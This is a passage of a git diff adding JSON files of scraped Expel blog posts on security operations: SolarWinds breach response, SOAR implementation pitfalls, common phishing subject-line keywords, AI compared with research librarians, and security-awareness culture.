screwed this thing up\u2026\u201d One thing I didn\u2019t screw up: the team we have here at Expel: sharp developers, analysts, seasoned security veterans and business professionals. They\u2019re all way smarter than I am, and it turns out they have some pretty interesting things to say. So we\u2019re creating this blog as a forum for you to hear a bit more from them. They don\u2019t want to spend time talking about Expel, per se. They want to spend time talking about information security , about those \u201caha!\u201d and \u201coh yeah!\u201d moments we have while we pursue our passion for protecting our customers. And occasionally, those \u201coh shh\u2026.\u201d moments when we screw something up. Hopefully, you can take an executable tidbit out of everything we say \u2013 a tip, trick, technique \u2013 something to make your information security world easier, better, or more fun. Come along with us. Bookmark our exe blog , tell your friends and engage us on the socials (twitterinstagramchat or whatever you crazy kids are using these days, marketing link here because they made me: follow us on LinkedIn and Twitter ). And please, please let me know if any of us use the phrase global market-leading cybersecurity company . Anyone caught doing that buys the next round. Oh yeah, and we\u2019re hiring !" +} \ No newline at end of file diff --git a/the-soc-organic.json b/the-soc-organic.json new file mode 100644 index 0000000000000000000000000000000000000000..88744711b5d250bee5eb2afb1f7e8b7851fc6a69 --- /dev/null +++ b/the-soc-organic.json @@ -0,0 +1,6 @@ +{ + "title": "The SOC organic", + "url": "https://expel.com/blog/the-soc-organic/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The SOC organic Security operations \u00b7 4 MIN READ \u00b7 DAVE JOHNSON \u00b7 MAR 14, 2023 \u00b7 TAGS: MDR These days, you can\u2019t swing a quantum cat without hitting a conversation about how recent artificial intelligence (AI) breakthroughs are changing our lives. Having grown up during the dawn of personal computing, the internet (*insert dialup modem sounds*), and cybersecurity, embracing new technology to find out what cool new things I can do is totally my jam. I\u2019m right there along with you in the assess, adapt, and adopt queue with AI. Innovations like ChatGPT are incredible. However, they\u2019re primarily designed to solve a problem we didn\u2019t have in The Olden Times\u00a9. Before the information superhighway, before copying and floppying, before we surfed the world wide web, we had\u2014stay with me here\u2013libraries. And so far, AI hasn\u2019t managed to replicate what\u2019s best about libraries. You may be asking yourself, \u201cWhat does this have to do with cybersecurity?\u201d Read on to find out. I absolutely adore libraries. The more books the better. Old books, new books, books written in other languages, reference, literature, fiction, everything, all of it. But books, admittedly, have some significant limitations. They\u2019re not immediately searchable and it\u2019s not easy to consume the data at speed, for example. The information in a book that you want must be ingested, deciphered, and contextualized. Some books and some readers do that far better than others, but the results are inconsistent. In the past, reading fast and being able to comprehend everything as much as possible in a systematic way was the primary strategy for getting the information you needed (aka \u201cresearch\u201d). Digital publishing and search engines fixed all that. They initially solved the problem quite well and we were all participants in this great experiment of connecting the world to information and placing it at our fingertips. At any given time I can search and receive the exact answer to a query like, \u201cWhat is the airspeed velocity of an unladen swallow?\u201d just by typing or speaking the question into the appropriate search engine. (It\u2019s 31-40 mph, BTW.) Then things changed. Search engines improved their capabilities and the dataset grew, but now we have a different challenge standing between us and the information we seek\u2014namely, search engine marketing. One problem is that organic results, which are usually what you\u2019re looking for, can be buried beneath advertising (many times the top organic result doesn\u2019t even appear on the first screen). Also, as most of us know from frustrating experience, it can still be hard to find what you want\u2014we can try every combination of search terms we can think of and still come up dry. That\u2019s where the new AI chatbots come into play (Microsoft recently launched its new ChatGPT-fueled Bing and Google\u2019s Bard is on the way). Given the right prompt, they can help us cut through the noise to the information we really want. We all ultimately want clear answers, and AI does this pretty well. (Although the ads won\u2019t go away, there should now be a cleaner signal:noise ratio.) There are some things missing, though. Context for one. For example, AI knows your purchasing history and consumer profile, but it doesn\u2019t necessarily know you or your hopes and dreams, as it were. It doesn\u2019t have any lived experiences that mirror your own. These context-free large language models have never been a person before (as recent chat transcripts make clear). They won\u2019t necessarily make connections to secondary factors relevant to your inquiry and they probably won\u2019t have a useful knack for the tactical application of serendipity. Libraries have always had a solution to that problem, though. Enter stage left, the amazing and borderline-omniscient Research Librarian! Ask any question of this highly trained, friendly neighborhood expert in just about everything, and you\u2019ll shortly receive straight, relevant answers, additional recommendations, along with additional context. Their training and experience allows them to deliver these results in the way you find most useful. I now submit to you, Dear Reader, my thesis: human civilization, in the development of AI, has been trying to reinvent something we pretty much always had, and still have today. Clear answers, delivered in a way that makes sense, with other valuable information attached and applied in a personalized context\u2014I think along the way we simply became so distracted by shiny new objects that we forgot the important part. Information, like any tool, is only as good as your ability to use it, and how it\u2019s delivered matters. And now, we come to answering the question posed above. Our team here at Expel keeps that end goal in mind. Our customers tell us they need max signal\u2014specific information, relevant context, references, and suggestions for further reading, and they need the noise eliminated. To deliver on that, we believe managed detection and response (MDR) should be as organic as possible and it should seamlessly integrate the best available automation technologies with the experience and insight of analysts who\u2019ve been there, done that, and understand what customers need. Tools should be designed and implemented with the ability to scale in mind and customers\u2019 desired results should always be the foundation for everything a provider does. This is the issue: what makes libraries awesome, and what AI is missing, is people. And we\u2019re big fans of people. As customers shop around the security space, they always hear how there\u2019s a better way. But too many have never been asked, only told. If security vendors pose questions and listen in good faith, prospects will tell them what that better way looks like. So as we consider the role that AI plays in cybersecurity, remember that it\u2019s a tool. It\u2019s pretty darn interesting, and brings with it major potential. But unless something significant changes, it won\u2019t deliver the outcomes that organizations need to keep their systems safe without a human touch and perspective. One more thing. If it\u2019s been a while since you\u2019ve visited your local public library, now is a great time to go. The membership cards are a lot cooler now, there\u2019s terabytes and tebibytes of digital comic books you can download and read, and some branches even have 3D printers and CnC machines you can use. While you\u2019re there, chat with the research librarians and ask them about the services they provide. Maybe tell them, \u201cExpel sent me.\u201d They\u2019ll initially have zero idea what you\u2019re on about, of course, but if you send them this post it just might provide them additional\u2026and relevant\u2026context. Great eXpeltations 2023" +} \ No newline at end of file diff --git a/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json b/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json new file mode 100644 index 0000000000000000000000000000000000000000..679dc7509adfeb65e524e86a3d7a66d958e7c918 --- /dev/null +++ b/the-solarwinds-orion-breach-6-ideas-on-what-to-do-next.json @@ -0,0 +1,6 @@ +{ + "title": "The SolarWinds Orion breach: 6 ideas on what to do next ...", + "url": "https://expel.com/blog/solarwinds-orion-breach-what-to-do-next/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The SolarWinds Orion breach: 6 ideas on what to do next and why Security operations \u00b7 3 MIN READ \u00b7 JON HENCINSKI, ANTHONY RANDAZZO, BRUCE POTTER AND MARY SINGH \u00b7 DEC 16, 2020 \u00b7 TAGS: Cloud security / MDR / Tech tools Well, 2020 is really going out with some fanfare, isn\u2019t it? The revelation of SolarWinds\u2019 Orion monitoring product being compromised by nation state intelligence is keeping a bunch of people very busy heading into the holidays. \u201cBah humbug\u201d to that. With a few days hindsight, we wanted to take a breath and offer some observations on how things are going, what we can expect going forward and how organizations everywhere should be thinking about detecting post-compromise malicious activity. Before we dive into the \u201chere\u2019s what we\u2019re seeing and how you should plan for the long haul,\u201d let\u2019s take a minute to applaud the leadership shown by FireEye, Microsoft and CISA. These orgs continue to be transparent on the technical and mission aspects of this attack. That transparency helped the entire cybersecurity industry understand the technical nature of the attack and begin to wrap our arms around the broader business impact to our customers. In turn, that helps our customers and any impacted businesses, in general, better understand their own risk as they navigate their way through this mess. Now let\u2019s dig into some observations and recommendations: You\u2019ll need to rewind the clock as you search for evidence of compromise as a result of the SolarWinds Orion breach. We\u2019ve seen instances of the backdoored SolarWinds Orion signed DLL, known as SUNBURST in many organizations, as have our peers. SolarWinds indicated up to 18,000 organizations may be vulnerable to this exploit, so it\u2019s hard to overstate the potential impact this backdoor could have on a broad set of industries. One of the challenges we\u2019re facing in scoping these incidents is the need to rewind the clock sufficiently to see when the earliest potential malicious actions could have taken place. In this case, SolarWinds indicated their software was implanted nine months ago, so ideally we\u2019d like to look through nine months of evidence to see signs of attack activity. Data retention policies might make this difficult. Unfortunately, retention policies can get in the way of this kind of look back and we may only get a few weeks or months worth of data to review. Data retention is a hard scale to balance; limiting cost and improving performance while maximizing historical accuracy means some organizations have the data they need in the wake of this breach but others do not. But vendors are (thankfully) jumping in and creating detections that\u2019ll help security teams everywhere identify and mitigate related attacks in the future \u2013 so ask your vendors what detections they\u2019re working on. Thanks to the turbo-charged @andrew__morris observation that the backdoored software was still on SolarWinds\u2019 website on Monday, December 14th, we continued to see new instances of the malicious DLL created on disk as customers attempted to upgrade their installation. Why is this good news? Because at least by that time most security vendors had detections in place so we saw it land and were able to immediately remediate. A big shout out to the vendor community at large for getting those detections created and pushed out in a timely manner. It makes a huge difference to operators when the cycle between news breaking and having functional detections in place is as short as possible. There\u2019s more good news: We haven\u2019t seen any evidence of recent SUNBURST command and control. This is a great sign for our customers. We do however have limited telemetry for our customers and this breach dates back to March 2020. This kind of event underscores the importance of having a fully functional EDR solution. In particular, you need one that supports robust remote forensic examination of a system. Being able to investigate endpoints at scale in an automated fashion to assess impact and risk to an organization as quickly as possible is incredibly important in an event like this. The bummer with these tools is that they really shine when the situation is the darkest. On a normal day when everything is normal you don\u2019t think, \u201cGosh! I wish I had a better EDR tool.\u201d But when things go totally sideways like they did this week, the quality of your EDR can change (or destroy) the game. With that said, sometimes a historical compromise like this can only be addressed with a good ol\u2019 fashioned incident response engagement. Be on the lookout for the long tail of compromise. The tail of these kinds of attacks can be quite long, and adversaries who entrenched themselves inside your org can be difficult to fully root out. Moving forward, we\u2019re focused on finding post-compromise activity observed during this global threat campaign. In particular, we\u2019re building detections and hunts for events such as Azure AD PowerShell behavior, modification of domain federation trust settings, and researching ways to discover forged SAML tokens, anomalous logins, Azure lateral movement, and privilege escalation activity. While many of these are events we\u2019re looking for anyway, we\u2019re turning the dials on orgs that may be compromised via SUNBURST to surface more of these events and correlate them in new ways based on the TTPs that were published as part of this attack. That\u2019s it for now. Thank goodness \u2026 IT and security folks everywhere don\u2019t need any more to deal with. In the coming weeks, we\u2019ll have even more visibility on both the technical and business shifts that are happening in both the cybersecurity industry and the economy at large. We\u2019ll keep you posted as we learn more. As always, we\u2019d love to hear from you if you have thoughts to share." +} \ No newline at end of file diff --git a/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json b/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json new file mode 100644 index 0000000000000000000000000000000000000000..6bf5e03eb868701e4c91e74831adc558d8a769bc --- /dev/null +++ b/the-top-cybersecurity-attack-trend-we-saw-emerge-during.json @@ -0,0 +1,6 @@ +{ + "title": "The top cybersecurity attack trend we saw emerge during ...", + "url": "https://expel.com/blog/top-cybersecurity-attack-trend-covid-phishing/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG The top cybersecurity attack trend we saw emerge during the COVID-19 pandemic Security operations \u00b7 ANTHONY RANDAZZO \u00b7 MAY 6, 2021 \u00b7 TAGS: Cloud security / MDR Finally \u2013 2020 is behind us. Unfortunately, Expel\u2019s SOC observed that attackers used the pandemic as an opportunity to evolve some nasty tactics. We pulled some data on the incidents we responded to over the past year and noticed a clear trend: phishing and BEC remain a top threat. Check out our infographic to get the full download on what our data reveals about the top attack trend in 2020 (and now)." +} \ No newline at end of file diff --git a/the-top-five-pitfalls-to-avoid-when-implementing-soar.json b/the-top-five-pitfalls-to-avoid-when-implementing-soar.json new file mode 100644 index 0000000000000000000000000000000000000000..52d779a3375519d0e7c8827be8f2e143c23ceba7 --- /dev/null +++ b/the-top-five-pitfalls-to-avoid-when-implementing-soar.json @@ -0,0 +1,6 @@ +{ + "title": "The top five pitfalls to avoid when implementing SOAR", + "url": "https://expel.com/blog/top-five-pitfalls-avoid-implementing-soar/", + "date": "Jul 10, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG The top five pitfalls to avoid when implementing SOAR Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 JUL 10, 2019 \u00b7 TAGS: CISO / Managed security / Management / Planning I was recently in a room full of CISOs and the topic-du-jour was SOAR . The headline on the PowerPoint slide read \u201cSOAR or SORE?\u201d \u2014 a joke to get the conversation started. Given limited budgets and the general shortage of experienced security talent, most of the CISOs in the room were already looking to automation to help bridge the gap between their operational reality and the unrealistic expectations of the rest of the business. But was automation really closing that gap? \u201cNo\u201d was the popular response, which came amid a smattering of \u201cnot yets\u201d and \u201cit\u2019s starting to.\u201d It seemed that at least some orgs were beginning to implement systems that were automating workflows and streamlining security operations. But is merely beginning to automate things here and there enough to say that you\u2019re doing SOAR? What is SOAR? As it turns out, it all depends on how you interpret the definition of SOAR. Some say it\u2019s not SOAR unless it can operate independently without human intervention . Others claim SOAR is a ticketing system, or case management system, but not the IT ticketing system, but maybe not a ticketing system at all . All of these definitions and interpretations can make your head spin. Whether or not you believe robots can replace humans entirely (we don\u2019t, by the way), I don\u2019t think these disagreements about definitions matter much. For our purposes, let\u2019s define SOAR broadly. It\u2019s some set of technologies that helps you integrate the security tech you already have (and will add over time) and weave it together so it saves you time and helps your humans scale better. Yes, I understand that Python.org or /bin/bash probably both qualify as SOAR according to this definition. Let\u2019s assume for a moment I\u2019m not stressed out about that. A little history explains why. But what really is SOAR? Longer ago than I\u2019d like to think about, I worked on the security team at America Online. At the time, we had to build much of our technology in house because what was available commercially (or even as open source) wouldn\u2019t work at our scale \u201cout of the box.\u201d It\u2019s the same sort of problem folks like Netflix and Google faced years later. So we ended up building middleware (pretty sure this is what SOAR was called back then) to streamline a variety of security workflows to support identity and access management, authorization management and incident response. One of the initial challenges we had when trying to automate from point A to point Z was that the \u201cbusiness rules\u201d kept changing under our feet. That made it hard to code the steps in between. So we built a generic system to automate the parts that were largely static, left a few key steps in the middle for humans and then technology picked the workflows back up again and finished the process. Here\u2019s a quick IAM example: 1) let software collect information from managers about who needed access to what; 2) let the software provision access directly where APIs were available and 3) create tickets for humans where APIs were absent. Then, when all access was provisioned, handle the notifications and track the access over time to ensure it was disabled if not used in 90 days or if not renewed by managers after 365. Overall this system worked well, but maintenance costs were heavy because systems across the company kept changing \u2026 which meant the APIs and underlying data models changed constantly too. It should be called SORE Walk into any development shop and the engineers are probably familiar with the phrase \u201cit\u2019s like changing a jet engine mid-flight.\u201d It\u2019s the age-old problem of introducing (or replacing) technology without damaging the business. And it\u2019s HARD. Making significant changes to a technology platform that\u2019s used heavily (or used at all) is a painstaking endeavor \u2026 and when the technology in question was built over time \u2014 \u201corganically\u201d \u2014 rather than as part of a well thought out architecture that could withstand future changes, well \u2026 most engineering teams find themselves drowning in tech debt . So let me propose this: SOAR is not \u201corchestration and response.\u201d Those aren\u2019t the activities you\u2019re doing when you implement SOAR. SOAR is SORE. Jokes and conversations starters aside, it really should be \u201c Security Operations and Response Engineering .\u201d This is an engineering problem and should be treated as such. What do I mean by \u201cas such?\u201d I\u2019m glad you asked. Five pitfalls when implementing SOAR Because I\u2019ve learned the hard way what not to do, I\u2019m now sharing with you the five mistakes I wish I hadn\u2019t made. Pitfall 1: Automating everything The Great Chicago Fire of 1871 (hang with me here, I promise it\u2019s relevant) took out over three square miles of the city, hopped the river and displaced 100,000 people before it was done. At the time, Chicago\u2019s firefighters relied on horse-drawn carriages for fire engines. Imagine solving this problem with \u201cautomation.\u201d You could put Ferrari engines in fire trucks and the firefighters would have arrived faster. But it wouldn\u2019t have solved the problem. The firefighters were exhausted from putting out both small and large fires over the past week. Instead of jumping to automation as the solution, maybe it\u2019s worth taking a look at why there are so many fires in the first place. When your city\u2019s made primarily of wood and lumber yards are located on the banks of the river \u2014 which let fires quickly move from one side of town to another \u2014 you\u2019ve got some pretty compelling reasons to make architectural changes before turning to automation. SOAR is no different. Take the time to understand what\u2019s driving the volume of your work and see if there are architectural changes or tuning you can do upstream in your security infrastructure before you automate. Pitfall 2: Listening to your analysts Just kidding \u2014 you should totally listen to your analysts. But evaluate what they say in the context of data. As a general rule, if you ask an analyst what to automate, they\u2019ll describe an annoying time-consuming process they had to go through last Tuesday. What they won\u2019t tell you is that it\u2019s the only time they\u2019ve had to do that this month. It\u2019s a recent enough memory though and painful enough that they don\u2019t want to have to do it again \u2026 so that\u2019s what\u2019s top of mind. Beyond anecdotal recaps of something an analyst thought was tedious, you need metrics. As you figure out what to automate, metrics will help you make that decision and prioritize your engineering investments. Fixing an annoying workflow during an investigation might save one person a half hour once a month, but cutting one minute from a triage step (that nobody realizes they\u2019re doing because it\u2019s muscle memory at this point) could save everyone on your team a half hour a month. Good instrumentation and metrics management will help you figure out what to automate next (pro tip: check out tools like Datadog and Tableau to organize, visualize and analyze your data). Pitfall 3: Building brittle integrations I like to think about SOAR platforms as being measured best by TTP: time-to-Python. How much will your SOAR platform do for you before you have to write Python? It\u2019s usually measured in minutes. Beyond lambasting the limitations of SOAR, though, let\u2019s take a look at the software you write to achieve the orchestration you want. If your security team is like most, you\u2019re likely to swap out at least one technology in each tech category every four years or so. Maybe your SIEM (Security Information and Event Management) tech sticks around longer ( even though you wish it wouldn\u2019t ). To avoid the pain of \u201crebuilding everything\u201d each time to swap out a security product, you\u2019ve gotta make one crucial investment \u2014 adding an abstraction layer between \u201canalysis\u201d and \u201csecurity product.\u201d With an effective abstraction layer, you normalize data and queries across similar technologies. For example, one endpoint tech becomes no different from another upstream in the technology stack. Your analysts and your analytics can say \u201cget me this file,\u201d and your SOAR architecture will figure out how to do that with Tanium today \u2014 and it won\u2019t skip a beat if you try to do it with Carbon Black tomorrow. Anything short of this and you\u2019ve built a brittle integration that you\u2019ll need to rebuild later. While you\u2019re at it, watch out for other areas that might be brittle. If you\u2019re automating a process you don\u2019t understand well\u2026 it\u2019s liable to break readily. On the topic of things breaking\u2013expect your processes, your technology, and even your people to fail from time to time. The automation you build needs to stand up to those failure conditions without creating more work. Pitfall 4: Assuming you\u2019re getting better The old management adage goes like this: \u201cWhat gets measured gets done.\u201d If you really want to improve your orchestration and automation, it\u2019s vital you know where you are today to figure out (and celebrate) as you improve. Some of this you\u2019ll do through operational metrics that you\u2019ve put in place as part of a security operations and response program. Fixating on this, though, could cause you to lose sight of the big picture. Imagine for a moment you\u2019ve built a security operations program that operates effectively but is optimized to find and stop nation-state attackers. That\u2019s great if you\u2019ve got other countries all up in your business every other week, but less effective when garbage spear phishing results in business email compromise every day. You need both capabilities and by fixating on just a subset of your metrics, you might be celebrating myopia. Security operations, whether SOAR-enabled or not, operates in the context of the broader risk management environment. If you\u2019re making conscious decisions across this broader scope, you\u2019re less likely to over-invest in one capability at the detriment of another that you need even more. There are lots of ways to get this done, but we\u2019re fans of the NIST Cybersecurity Framework. It\u2019s comprehensive, helps guide your thinking, and it\u2019s not hard to get started . As you continue developing your security program, take another measurement. Mixing internal assessments with less frequent external ones like NIST will ensure you\u2019re seeing the forest through the trees and help you mitigate your own bias. Pitfall 5: Getting comfortable It\u2019s rare to find a CISO who\u2019s complacent. Most are perpetually on edge, somewhat (who are we kidding?) paranoid and wondering if today is the day everything goes down in flames . Still, when you spend so much of your time making sure the plates keep spinning , it\u2019s tough to take the time to inject yet more chaos into the system to see how the team handles it. Staying with the big picture theme, tabletop exercises are great ways to think through how you\u2019d respond in the face of a real problem. When you think about getting comfortable in the context of SOAR \u2013 realize that the automation you\u2019ve built ages. The processes you\u2019ve solidified into automation may have worked well when they were built\u2026 but as the business has changed around your implementation, do the same assumptions hold true? Or is it time to re-think the process and therefore the automation. One of the most effective ways to figure this out is through scenarios. We run tabletop exercises every quarter at Expel and it never ceases to amaze me the breadth of interesting discoveries we make, far afield from security technologies, let alone SOAR. It really puts things in perspective. Still, who really wants to sit in a room and plod through boring and stressful scenarios? Fortunately, we\u2019ve got something that might help. If you enjoy games (especially D&D) and are willing to shake things up a little with your executive team, check out Oh Noes! It a security-focused tabletop exercise, D&D style. Bring some Doritos and you\u2019ve got a social event and risk-management exercise in one. Where do you go from here? Avoiding pitfalls seems like a tough thing to do today. \u201cOkay, I\u2019ll watch out for those problems,\u201d you might think. But we\u2019re all on a journey as we look to improve what we\u2019re doing from a day-to-day security perspective. Whether you\u2019re in the middle of SOAR implementation or it\u2019s still on the far distant horizon at your org, there are things you can do today to help you prepare or adapt. Take a measurement . Figure out where you are from a security program perspective. Inject some (healthy) chaos . Try Oh Noes! and entertain your team. Contemplate your metrics . Evaluate if you\u2019ve got the right ones in place. If you\u2019re still wondering if SOAR is right for your org or how you might go about implementing it, let us know \u2014 we\u2019d love to talk ." +} \ No newline at end of file diff --git a/the-top-phishing-keywords-in-the-last-10k-malicious.json b/the-top-phishing-keywords-in-the-last-10k-malicious.json new file mode 100644 index 0000000000000000000000000000000000000000..10278c229955c8e88c74a8fee75d2ba8cc5ae2d2 --- /dev/null +++ b/the-top-phishing-keywords-in-the-last-10k-malicious.json @@ -0,0 +1,6 @@ +{ + "title": "The top phishing keywords in the last 10k+ malicious ...", + "url": "https://expel.com/blog/top-phishing-keywords/", + "date": "Sep 8, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG The top phishing keywords in the last 10k+ malicious emails we investigated Security operations \u00b7 5 MIN READ \u00b7 RAY PUGH AND SIMON WONG \u00b7 SEP 8, 2021 \u00b7 TAGS: MDR / Phishing Did you get a chance to read our report on the top attack vectors used by bad actors in July ? If not, here are two important takeaways: Phishing was the top threat in July, making up 72 percent of the incidents our Security Operations Center (SOC) investigated. Breaking this down further, nearly 65 percent of the incidents our SOC investigated in July were Business Email Compromise (BEC) attempts in Microsoft Office365 (O365). TL;DR: Phishing is on the rise and we expect it to stay that way. So preventing BEC and credential harvesting through phishing should be a priority for resilience efforts. We decided to take a look at how bad actors are enticing their victims to open and engage with phishing campaigns. We analyzed the last 10 thousand malicious emails that our team investigated to determine the top keywords bad actors are using in their email subject lines. As you\u2019ll see below, these keywords aim to make recipients interact with the content of the email by targeting one or more of these themes: Imitating legitimate business activities Creating a sense of urgency Prompting the recipient to act In this post, we\u2019ll share the top keywords used in email subject lines, examples of subject lines from the malicious emails we investigated and some context around why bad actors might choose to use each keyword. Knowing how bad actors are targeting their victims can help inform your phishing strategy and education program. Top Phishing Keywords Invoice Real subject lines: RE: INVOICE Missing Inv ####; From [Legitimate Business Name] INV#### Context : Generic business terminology doesn\u2019t immediately stand out as suspicious and maximizes relevance to the most potential recipients by blending in with legitimate emails, which presents challenges for security technology. Most people are also inclined to respond promptly to communications from co-workers, vendors or clients if they believe action is required, like returning an invoice. New Real subject lines: New Message from #### New Scanned Fax Doc-Delivery for #### New FaxTransmission from #### Context : \u201cNew\u201d is commonly used in legitimate communications and notifications, and aims to raise the recipient\u2019s interest. People are drawn to new things in their inbox, wanting to make sure they don\u2019t miss something important. Message Real subject lines: Message From #### You have a New Message Telephone Message for #### Context : Most people using a work account want to make sure they\u2019re promptly responding to communications from co-workers, vendors or clients \u2013 and are inclined to read or listen to new messages quickly. Required Real subject lines: Verification Required! Action Required: Expiration Notice on [business email address] [Action Required] Password Expire Attention Required. Support ID: #### Context : Keywords that promote action or a sense of urgency are favorites among attackers because they prompt people to click without taking as much time to think. \u201cRequired\u201d also targets employees\u2019 sense of responsibility to urge them to quickly take action. Context : Blank subject lines generally evade automated security measures \u2013 security tech can\u2019t scan for phishing or spam keywords if there aren\u2019t any. File Real subject lines: You have a Google Drive File Shared [Name] sent you some files File- #### [Business Name] Sales Project Files and Request for Quote Context : \u201cFile\u201d is another generic business term used in work emails and notifications. Using this term helps these phishing emails blend in with legitimate emails \u2014 creating another challenge for security technology. Again, people are inclined to respond in a timely manner to communications from co-workers, vendors or clients. Request Real subject lines: [Business Name] SALES PROJECT FILES AND REQUEST FOR QUOTE [Business Name] \u2013 W-9 Form Request Your Service Request #### Request Notification: #### Context : Requests are sufficiently general for mass phishing campaigns, while insinuating the recipient needs to take action. Some examples include prompting the user to access a link, download a file or provide sensitive personal information. Action Real subject lines: Action Required: Expiration Notice on [business email address] Action Required: [Date] Action Required: Review Message sent on [Date] [Action Required] Password Expire Context : Promoting action and a sense of urgency increases the chances that a recipient will act immediately after reading the message without taking much time to think, rather than leaving the email for later and potentially forgetting to respond. Document Real subject lines: File Document #### [Name], You have received a new document in [Company system] Attn: [Name] \u2013 You have an important [Business name] designated Document Document For [business email address] View Attached Documents [Name] shared a document with you Context : Like \u201cfile,\u201d \u201cdocument\u201d is regularly used in subject lines and notifications, again helping the attacker target the most recipients and blend in with legitimate emails, challenging security technology. Once again, sharing a file prompts employees to respond in a timely manner to avoid missing work-related information. Verification Real subject lines: Verification Required! Context : \u201cVerification\u201d insinuates the recipient needs to take action, likely in a timely manner. Again, the user may be prompted to access a link, download a file or provide sensitive personal information. eFax Real subject lines: eFax from ID: #### eFax\u00ae message from \u201c[phone number]\u201d \u2013 2 page(s), Caller-ID: +[phone number] Context : eFaxes are still used broadly as part of normal business operations for many orgs, so users may be tempted to click the link or download the file. VM Real subject lines: VM from [phone number] to Ext. ### on Tuesday, May 4, 2021 VM From ****#### Received \u2013 for <[user name]> July 26, 2021 \u2018\u201d\u201d\u201d1 VMAIL RECEIVED on Monday, June 21, 2021 3:02:55 PM\u201d\u201d Context : Most people using a work account want to make sure they\u2019re promptly responding to communications from co-workers, vendors or clients, and are inclined to read or listen to new messages quickly. What to do next Successful credential harvesting through phishing can lead to an array of problems for a business. Luckily, there are a lot of things you can do to try to stop bad actors in their tracks. Number one \u2013 enable multi-factor authentication (MFA) for everything you can. Specifically with phish resistant MFA (FIDO/WebAuth). Even if a bad actor manages to harvest credentials through phishing, MFA can keep them from accessing your systems and data \u2013 and give you a heads up that someone\u2019s trying to break in. Another important thing orgs can do to prevent successful phishing campaigns is to develop comprehensive phishing education programs. Orgs should stay up-to-date on the latest phishing trends to update their policies and educate employees when new tactics are at play. Beyond training sessions, regularly test employees with mock phishing emails (and provide feedback on what in the email was suspicious) so they continue to learn, hone their detection skills and know how to report suspicious emails in their inbox. Encourage employees to take a closer look at emails using the above keywords to make sure they recognize the sender, that the sender\u2019s email looks legitimate (for example, does that voicemail notification match the official voicemail email for your org?) and that they are expecting the content of the email. If not, it\u2019s always better to double check with the supposed sender through another form of communication (we love Slack!) before clicking on any unexpected files. When it comes to phishing, complacency is a risk. And we\u2019ve seen that employees from orgs with strong phishing education programs are better at identifying actual malicious emails. Beyond MFA and education, there are additional things you can do to make your email system more secure in case an attacker manages to harvest credentials from an employee. Here are some of our top resilience recommendations: Disable legacy protocols like IMAP and POP3. Implement extra layers of conditional access for your riskier user base and high-risk applications. For O365 users, consider Azure AD Identity Protection or Microsoft Cloud App Security (MCAS). Want to find out how we stop BEC here at Expel? Check out Expel for Email ." +} \ No newline at end of file diff --git a/the-zen-of-cybersecurity-culture.json b/the-zen-of-cybersecurity-culture.json new file mode 100644 index 0000000000000000000000000000000000000000..3b9c3840799ba06bb973d87b09c44e072ad0037d --- /dev/null +++ b/the-zen-of-cybersecurity-culture.json @@ -0,0 +1,6 @@ +{ + "title": "The Zen of cybersecurity culture", + "url": "https://expel.com/blog/the-zen-of-cybersecurity-culture/", + "date": "Nov 4, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG The Zen of cybersecurity culture Tips \u00b7 5 MIN READ \u00b7 YANEK KORFF \u00b7 NOV 4, 2022 If we live a life of unawareness, we may get caught in the never-ending cycle of reacting to life\u2019s circumstances \u2013 Mingyur Rinpoche Cybersecurity Awareness Month just wrapped. This year\u2019s campaign theme\u2014\u201cSee Yourself in Cyber\u201d\u2014demonstrates that while cybersecurity may seem like a complex subject, ultimately, it\u2019s really all about people. This October will focus on the \u201cpeople\u201d part of cybersecurity, providing information and resources to help educate CISA partners and the public, and ensure all individuals and organizations make smart decisions whether on the job, at home or at school\u2013now and in the future. ( Cybersecurity and Infrastructure Security Agency ) This year\u2019s emphasis on people was refreshing. CAM always results in lots of blog posts and media articles sharing advice that people should follow, and this content is typically packed with outstanding information. At some point, though, our success in combating cybercrime needs to evolve past the \u201cadvice\u201d stage and move into the culture stage. Instead of the bullet points being something we think about doing, they must become things we do all the time, without having to think . Let\u2019s turn this into year-round culture. There\u2019s no question that designating a whole month to cybersecurity best practices is important. But cybersecurity awareness should be part of our day-to-day lives . Relying solely on following step-by-step advice for disaster prevention only in the month of October has the potential to stunt our progress toward a world built on ingrained safety and well-being. Is there a better, more positive way of thinking about this? The Zen distinction between thought and awareness provides some insight into where we are and where we want to go. Awareness itself allows us to stand at the river\u2019s edge without getting sucked into the current\u2026 Thoughts are still there. They may be quiet or turbulent, focused or wild and scattered. But we have stopped identifying with them. We have become the awareness, not the thoughts. We can think about our awareness and we can be aware of our thoughts , and a fully realized cybersecurity culture is grounded in the higher-order state. Consider driving a car. Safe driver checklists like this one \u2014which includes 33 steps\u2014lay out all the rules, most of which we learned while studying for our driver\u2019s licenses. But when we get behind the wheel, we don\u2019t pause to tick off each bullet. Most of us automatically buckle up. We check our mirrors before backing out of the driveway. We signal when we want to turn. We obey traffic signals and signs without thinking about it. We don\u2019t drag race through school zones. We turn on our lights at dusk and slow down when it snows. And most importantly, we pay attention to the traffic around us, because we know that awareness is our best defense.* In other words, we\u2019re part of a culture of highway safety. We had it modeled for us by adults as we were growing up. We learned it in drivers ed and passed the tests when we turned 16. Through practice and repetition, we behave safely without thinking about it. We have become the checklist. This is where we need to get with cybersecurity. But how? Some thoughts. Training . It goes without saying (but we\u2019ll say it anyway) that training is essential. As we think about evolving toward a \u201czen cybersecurity\u201d culture, here are a few things to consider. Training should be continuous . It isn\u2019t enough to have an annual or even semi-annual event. A program that schedules more routine engagement with security keeps good practices front-of-mind and introduces information about new threats. Training must be engaging . How often have you taken \u201ctraining\u201d where you hit play, went to do something else, then came back to take the \u201ctest\u201d? This is, by definition, not training\u2013you don\u2019t learn anything new or novel. Also, is the training basically a glorified PowerPoint? Modern audiences are accustomed to entertaining narratives driven by strong visual communication (and new information is interesting). These experiences establish a sensory baseline, and you can\u2019t learn when you\u2019re asleep. There are many ways to be boring, and all of them make for weak training. Training should be success-focused . Disaster cases are easy to find and make for compelling stories. But training that models winning provides the carrot to balance the stick of the daily news. No shame, no fear, no threats\u2014these aren\u2019t dynamics you want at the center of your culture. 